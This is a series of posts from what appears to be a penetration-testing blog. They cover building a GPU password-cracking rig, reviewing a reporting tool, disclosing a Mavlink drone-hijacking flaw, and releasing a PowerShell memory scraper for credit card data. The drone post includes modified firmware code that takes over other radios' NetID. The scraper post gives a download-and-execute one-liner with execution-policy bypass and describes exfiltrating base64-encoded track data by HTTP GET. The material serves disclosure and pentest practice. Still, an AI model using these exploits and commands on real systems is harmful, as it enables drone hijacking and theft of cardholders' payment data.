This build doesn't require any "black magic" or hours of frustration like desktop components do. If you follow this blog and its parts list, you'll have a working rig in 3 hours. These instructions should remove any anxiety of spending 5 figures and not knowing if you'll bang your head for days.
Upgrade our current rig from 6 gtx 970s to 8 gtx 1080. Don't blow a fuse.
Nowadays building mid-grade to high-end password crackers is like playing with legos, albeit expensive legos.
We did a time lapse of the build:
There are few things we learned during the purchasing and assembly.
The memory slots are not labeled. Fill the banks similar to this image.
In the image below you can see the brackets that attach to the rear of the GPU for added support. Probably not needed but if you were to ship this rig I'd install them. This thing is HEAVY!
We had no hardware issues but we installed one GPU, booted the system, and once we verified it could POST with no issues, we started installing the OS. Once Ubuntu finished installing, we later reinstalled all GPUs. Since things went so smoothly, next time I'd just fully install all GPUs and fire it up. Nothing to worry about.
Not going to cover this in detail. But here are few things we considered.
Once OS is installed, verify GPUs are detected by OS:
lspci | grep VGA
Update and install dependencies for drivers and hashcat
sudo apt-get update && apt-get upgrade sudo apt-get install gcc make p7zip-full git lsb-core
Download Nvidia drivers. Nvidia 375.26 was current at the time of this build (January 2017).
UPDATE 4/10/2017 - If using 1080 Ti, use driver 378.13
wget http://us.download.nvidia.com/XFree86/Linux-x86_64/375.26/NVIDIA-Linux-x86_64-375.26.run chmod +x NVIDIA-Linux-x86_64-375.26.run sudo ./NVIDIA-Linux-x86_64-375.26.run
If you get warning messages about x86 you can ignore them. Here's an example of one:
WARNING: Unable to find a suitable destination to install 32-bit compatibility libraries. Your system may not be set up for 32-bit compatibility. 32-bit compatibility files will not be installed; if you wish
[Cto install them, re-run the installation and set a valid directory with the --compat32-libdir option
Install OpenCL runtime (not required but why not, use those CPUs too)
wget http://registrationcenter-download.intel.com/akdlm/irc_nas/9019/opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25.tgz tar -xvf opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25.tgz cd opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25 ./install.sh
wget https://hashcat.net/files/hashcat-3.30.7z 7z x hashcat-3.30.7z cd hashcat-3.30
Test hashcat by running a benchmark...at 341 GH/s!!!!
meatball@kraken3:~/hashcat-3.30$ ./hashcat64.bin -m 1000 -b hashcat (v3.30) starting in benchmark mode... OpenCL Platform #1: NVIDIA Corporation ====================================== * Device #1: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU * Device #2: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU * Device #3: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU * Device #4: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU * Device #5: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU * Device #6: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU * Device #7: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU * Device #8: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU Hashtype: NTLM Speed.Dev.#1.....: 42896.1 MH/s (62.48ms) Speed.Dev.#2.....: 42604.1 MH/s (62.97ms) Speed.Dev.#3.....: 42799.0 MH/s (62.57ms) Speed.Dev.#4.....: 42098.9 MH/s (63.68ms) Speed.Dev.#5.....: 42871.5 MH/s (62.57ms) Speed.Dev.#6.....: 42825.0 MH/s (62.64ms) Speed.Dev.#7.....: 42848.9 MH/s (62.54ms) Speed.Dev.#8.....: 42449.8 MH/s (63.16ms) Speed.Dev.#*.....: 341.4 GH/s Started: Mon Feb 13 17:54:12 2017 Stopped: Mon Feb 13 17:54:31 2017
Install dependencies
sudo apt-get update sudo apt-get install mysql-server libmysqlclient-dev redis-server openssl mysql_secure_installation
Optimize the database
vim /etc/mysql/my.conf
Add the following line under the [mysqld] section:
innodb_flush_log_at_trx_commit = 0
Restart mysql
service mysql restart
Install RVM - (commands below are from https://rvm.io/rvm/install)
gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 \curl -sSL https://get.rvm.io | bash -s stable --ruby
Download and setup Hashview
git clone https://github.com/hashview/hashview cd hashview
Install gems (from Hashview directory)
rvm install ruby-2.2.2 gem install bundler bundle install
Setup database connectivity
cp config/database.yml.example config/database.yml vim config/database.yml
Create database
RACK_ENV=production rake db:setup
In another terminal or screen session, kick off resque
RACK_ENV=production TERM_CHILD=1 QUEUE=* rake resque:work
note: In production mode no output will be displayed until a job has started
Run Hashview
RACK_ENV=production ruby hashview.rb
Start a job and start cracking!
Then intensely watch analytics in realtime while sipping on your favorite cocktail
We just bought our second 8 GPU rig! In a future post we'll show you how to easily support distributed cracking using Hashview.
@caseycammilleri
TL;DR: Reporting sucks, rarely does anyone enjoy it. Serpico is a tool that helps with reporting and makes it suck less through collaboration and automation, saving you time that you’d rather spend pentesting. Serpico is easy to install and works out of the box, yet highly customizable. Automating AND customizing your reports has never been more painless (I’ve tried lots of solutions). It might make you enjoy reporting…maybe 😉
https://www.github.com/serpicoproject
A case study in pentest reporting using Serpico
I first learned of Serpico through a good friend (and project developer) Pete Arzamendi (bokojan). It was developed by pentesters faced with the same reporting challenges I often battled. Will Vandevanter (@_will_is) used his wickedly awesome knowledge on Office XML to develop Serpico, a powerful pentest reporting tool. He’s also the reason why I’m obsessed with Ruby and Sinatra.
So you might be wondering, haven’t I heard of Dradis or MagicTree? Yes, I’ve heard of them, and during every new release I’d install them and hope for it to ease our reporting pain, but they always feel short.
Our existing solution was a report template in Word with custom document properties as variables. We’d have another Word document containing all the findings that we’d crib from. Unfortunately, the existing reporting solutions increased our time because we were always having to heavily modify them or spend time dealing with software and report generation errors.
Existing challenges related to report automation:
Features of Serpico and how we benefit from them
Serpico was quick and easy to install. I went from install to a customized generated report within 30 minutes. Update: Recently an omnibus packaged installer was developed, making the install even faster! I added a finding to a test report and out popped a word docx with no errors, no funky formatting issues, exactly like I always wanted. Will has done some research with Office XML, giving him a good understanding of all the Microsoft nuances that make this task more difficult than you’d think.
Here is a brief list of features that I find useful as a penetration tester:
Serpico supports both. Currently we use a centralized model. All users connect to one instance of Serpico to do reporting. However, on a couple occasions we were forced do an onsite pentest with no Internet access and without any sensitive data leaving the premise. One of us simply installed Serpico locally and using its import and export features, we were able to move all of our templated findings to our local instance very quickly.
I wrote this on the plane to Blackhat and Defcon 2016. The Serpico team asked me to to join them at Blackhat Arsenal and I’m happy to help! Stop by to see a working demo and say hi. Follow @SerpicoProject for future updates.
Recently some of us here at shellntel have been building quadcopters and autonomous vehicles for fun. We are big fans of the Pixhawk flight controller for its awesome autonomous capabilities. We are also big fans of privacy. As much as we like to build and fly these drones, we realize doing so in an irresponsible way can cause concern. We started looking into the various drone communications and discovered a design flaw that allowed us to take control of any drone flying with a specific telemetry protocol.
Telemetry allows the drone to exchange information and commands wirelessly with a ground station. This includes sending/receiving GPS coordinates, waypoints, throttle adjustments, arm and disarm commands, pretty much anything, including a serial shell.
The design flaw is not unique to PixHawk, but rather with the Mavlink protocol. Mavlink is used by many companies including: Parrot AR.Drone (with Flight Recorder), ArduPilot, PX4FMU, pxIMU, SmartAP, MatrixPilot, Armazila 10dM3UOP88, Hexo+, TauLabs and AutoQuad. All of these companies make great products, but if they adopt the Mavlink protocol as is, it may be possible to hijack their drones (and any other drone using Mavlink).
According to its documentation, each Mavlink radio pair is setup with a NetID or channel. This is done to prevent two radio pairs from interfering with each other. By default this value is set to 25, but the user can change this setting. To hijack one of these drones, all you'd need to do is set your transmitter to the same NetID as the target drone.
Looking at the protocol spec, each data packet sent by the radio includes the NetID in its transmission! This means that all we need to do is listen for a single packet within the frequency spectrum, capture it, carve the NetID, and set our radio to use it. This, is surprisingly easy.
Using these radios (we used v2), we can modify the OSS firmware to simply do this. The following changes were made to radio.c which when compiled is flashed to the transmitter.
Original Code:
// decode the header errcount = golay_decode(6, buf, gout); if (gout[0] != netid[0] || gout[1] != netid[1]) { // its not for our network ID debug("netid %x %x\n", (unsigned)gout[0], (unsigned)gout[1]); goto failed; }
Modified Code:
// decode the header errcount = golay_decode(6, buf, gout); if (gout[0] != netid[0] || gout[1] != netid[1]) { // its not for our network ID /* Modified by __int128 */ // Set our radio to use the captured packets NetID param_set(PARAM_NETID, gout[0]); // Save the value to flash param_save(); // To read the new value we need to reboot. Rebooting RSTSRC |= (1 << 4); /* End of what was added by __int128*/ }
The variable gout[0] is set earlier in the radio.c; which is populated with the NetID of all captured packets. This block of code is only hit when our radio hears a packet from another radio set on a different NetID from ours (which is good because don’t want to reboot each time we hear a new packet). Anyway, that’s it, 3 lines of code is all it takes to hijack any drone using Mavlink. Compile it, flash the radio and you’re good to go. It works surprisingly well and is super quick.
During the post exploitation phase of a penetration test, I like to provide the client with examples of what could happen if a breach were to take place. One of the most common examples of this is credit card theft. To demonstrate this threat, I created a PowerShell memory scraper against whatever application (many times browsers) the target is using to harvest track data. Why PowerShell? Because anti-virus doesn't prevent it and it provides me the ability to quickly modify the script, tailoring it for the application used within the organization.
Thanks to the awesomeness of @mattifestation and PowerSploit, you can use Out-Minidump to create a memory dump of a process. I created a lightweight script with logic to continuously dump a process's memory and scrape it for track data. Using Internet Explorer as an example, the script performs the following:
You can download the script from Github (here):
git clone https://www.github.com/shellntel/scripts
Here is a screenshot of the memory scraper in action harvesting track data:
very old expired credit card...don't even know why I redacted it
I created few features that I find handy. One is the ability to encode and exfiltrate track data to a listener I have setup. It base64 encodes the track data and does a HTTP GET request with the data included. I never send this data across the Internet, only to an internal box of my control or over an encrypted tunnel. You can use any method to setup a listener but my favorite is:
python -m SimpleHTTPServer 80
The code supports harvesting plain card numbers if track data is not available, which I've used with success, but occasionally contains false positives. There is a Luhn check and some regexs to help reduce the false positives, but if that isn't enough, you can specify an IIN/BIN (http://www.binlist.net) to match on. Matching on IINs comes in handy when your client/target is in the financial industry. Coworker @curi0usJack helped me squash bugs and implemented a duplicate checking feature so we're not sending and logging the same data over and over.
Many times my targeted users are utilizing a terminal server environment. This makes my life easy because I can run the memory scraper at a centralized location (the terminal servers), but since there are multiple users, you will want to limit the memory scraping to only processes used by your targeted users. If not, you could be dumping memory from hundreds of processes that might not contain credit card data. For this reason, I built a function that checks the process owner against the values of the -User parameter. My common workflow is to identify my targeted users through group name in active directory, then specify them using the -User parameter and just let the memory scraper bake for a few days.
Everyone likes one-liners. If you want to run the memory scraper (example process is iexplore) run the following from the target system:
powershell.exe -exec bypass -Command "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/shellntel/scripts/master/mem_scraper.ps1','mem_scraper.ps1');./mem_scraper.ps1 -Proc iexplore;"
I've found this method to be the quickest and most reliable. It only takes me minutes to narrow down my targets and deploy. The script can be downloaded from Github and will work with PowerShell v2 and v3. I encourage you to give it a try on your next pentest (or within your organization with permission of course) and provide feedback.
Happy harvesting!
@CaseyCammilleri